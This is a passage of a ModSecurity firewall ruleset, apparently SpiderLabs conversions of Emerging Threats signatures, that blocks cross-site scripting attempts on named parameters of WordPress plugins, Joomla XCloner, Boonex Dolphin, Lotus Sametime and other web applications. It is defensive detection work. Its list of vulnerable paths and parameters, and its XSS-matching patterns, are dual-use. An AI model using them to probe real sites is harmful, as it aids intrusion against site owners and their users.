SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WORDPRESS Plugin Accept Signups email Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /plugins/accept-signups/accept-signups_submit.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012164,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WORDPRESS Plugin Accept Signups email Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:email/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WORDPRESS Plugin Accept Signups email Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012187) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS bizdir.cgi f_srch Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /bizdir/bizdir.cgi" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012187,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS bizdir.cgi f_srch Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:f_srch/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS bizdir.cgi f_srch Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012190) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Zimplit CMS client Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /English_manual_version_2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012190,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Zimplit CMS client Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:client/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Zimplit CMS client Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012191) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Zimplit CMS file Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /zimplit.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012191,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Zimplit CMS file Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains action=load" "chain" SecRule &TX:'/XSS.*ARGS:file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Zimplit CMS file Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012216) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS B-Cumulus tagcloud.swf Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /tagcloud.swf" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012216,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS B-Cumulus tagcloud.swf Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains mode=tags" "chain" SecRule &TX:'/XSS.*ARGS:tagcloud/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS B-Cumulus tagcloud.swf Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012220) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS B-Cumulus tagcloud-ru.swf Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /tagcloud-ru.swf" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012220,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS B-Cumulus tagcloud-ru.swf Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains mode=tags" "chain" SecRule &TX:'/XSS.*ARGS:tagcloud/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS B-Cumulus tagcloud-ru.swf Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012337) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CultBooking lang Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /cultbooking.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012337,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS CultBooking lang Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:lang/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CultBooking lang Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012351) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Emerson Network AllResults.aspx Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /SearchCenter/Pages/AllResults.aspx" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012351,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Emerson Network AllResults.aspx Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:k/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Emerson Network AllResults.aspx Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012353) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Audio showfile Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/audio/getid3/demos/demo.browse.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012353,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Audio showfile Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:showfile/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Audio showfile Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012355) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Moodle PHPCOVERAGE_HOME Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /lib/spikephpcoverage/src/phpcoverage.remote.top.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012355,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Moodle PHPCOVERAGE_HOME Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule QUERY_STRING|REQUEST_BODY "(?i:PHPCOVERAGE_HOME\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Moodle PHPCOVERAGE_HOME Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012356) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Featured Content param Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /js/modalbox/tests/functional/_ajax_method_get.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012356,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Featured Content param Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:param/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Featured Content param Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012370) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Boonex Dolphin explain Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /explanation.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012370,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Boonex Dolphin explain Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46337'" SecRule QUERY_STRING|REQUEST_BODY "(?i:explain\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Boonex Dolphin explain Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012371) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Boonex Dolphin relocate Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /modules/boonex/custom_rss/post_mod_crss.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012371,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Boonex Dolphin relocate Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46337'" SecRule QUERY_STRING|REQUEST_BODY "(?i:relocate\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Boonex Dolphin relocate Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012380) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Podcast Generator themes.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /core/themes.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012380,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Podcast Generator themes.php Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:L_failedopentheme/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Podcast Generator themes.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012394) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IBM Lotus Sametime Server stconf.nsf Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains stconf.nsf/WebMessage" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012394,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS IBM Lotus Sametime Server stconf.nsf Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2011-1038'" SecRule REQUEST_LINE "@contains OpenView" "chain" SecRule &TX:'/XSS.*ARGS:messageString/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IBM Lotus Sametime Server stconf.nsf Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012395) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IBM Lotus Sametime Server stconf.nsf Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains stconf.nsf" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012395,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS IBM Lotus Sametime Server stconf.nsf Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2011-1038'" SecRule QUERY_STRING|REQUEST_BODY "(?i:stconf.nsf.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D).+unescape)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IBM Lotus Sametime Server stconf.nsf Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012411) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress updateAJAX.php post_id Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012411,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress updateAJAX.php post_id Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:post_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IWantOneButton Wordpress updateAJAX.php post_id Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012418) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PhreeBooks js_include.php form Parameter Cross Site Scripting Attempt 1 SecRule REQUEST_LINE "@contains /shipping/methods/fedex_v7/label_mgr/js_include.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012418,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PhreeBooks js_include.php form Parameter Cross Site Scripting Attempt 1',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:form/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PhreeBooks js_include.php form Parameter Cross Site Scripting Attempt 1',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012419) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PhreeBooks js_include.php form Parameter Cross Site Scripting Attempt 2 SecRule REQUEST_LINE "@contains /shipping/pages/popup_shipping/js_include.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012419,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PhreeBooks js_include.php form Parameter Cross Site Scripting Attempt 2',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:form/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PhreeBooks js_include.php form Parameter Cross Site Scripting Attempt 2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012428) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php option Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/xcloner-backup-and-restore/index2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012428,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php option Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46582'" SecRule REQUEST_LINE "@contains task=dologin" "chain" SecRule &TX:'/XSS.*ARGS:option/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php option Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012429) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php mosmsg Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/xcloner-backup-and-restore/index2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012429,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php mosmsg Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46582'" SecRule &TX:'/XSS.*ARGS:mosmsg/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php mosmsg Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012430) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla XCloner Component index2.php mosmsg Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_xcloner-backupandrestore/index2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012430,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla XCloner Component index2.php mosmsg Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46582'" SecRule &TX:'/XSS.*ARGS:mosmsg/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla XCloner Component index2.php mosmsg Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012437) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Zotpress citation Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/zotpress/zotpress.image.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012437,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Zotpress citation Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:citation/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Zotpress citation Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012474) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RecordPress rp-menu.php sess_user Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /admin/rp-menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012474,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS RecordPress rp-menu.php sess_user Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46798'" SecRule &TX:'/XSS.*ARGS:_SESSION[sess_user]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS RecordPress rp-menu.php sess_user Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012475) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RecordPress header.php titledesc Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012475,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS RecordPress header.php titledesc Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46798'" SecRule &TX:'/XSS.*ARGS:row[titledesc]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS RecordPress header.php titledesc Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012476) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin folder.php type Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/1-flash-gallery/folder.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012476,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin folder.php type Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:type/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin folder.php type Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012483) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wikiwig spell-check-savedicts.php to_p_dict Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012483,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Wikiwig spell-check-savedicts.php to_p_dict Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:to_p_dict/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wikiwig spell-check-savedicts.php to_p_dict Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012484) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wikiwig spell-check-savedicts.php to_r_list Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012484,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Wikiwig spell-check-savedicts.php to_r_list Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:to_r_list/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wikiwig spell-check-savedicts.php to_r_list Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012573) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RecordPress header.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012573,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS RecordPress header.php Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:row[titledesc]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS RecordPress header.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012574) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RecordPress header.php rp-menu.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /admin/rp-menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012574,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS RecordPress header.php rp-menu.php Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:_SESSION[sess_user]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS RecordPress header.php rp-menu.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012581) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/lazyest-gallery/lazyest-popup.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012581,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:image/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012582) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Interleave basicstats.php AjaxHandler Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /basicstats.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012582,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Interleave basicstats.php AjaxHandler Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46771'" SecRule &TX:'/XSS.*ARGS:AjaxHandler/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Interleave basicstats.php AjaxHandler Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012601) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 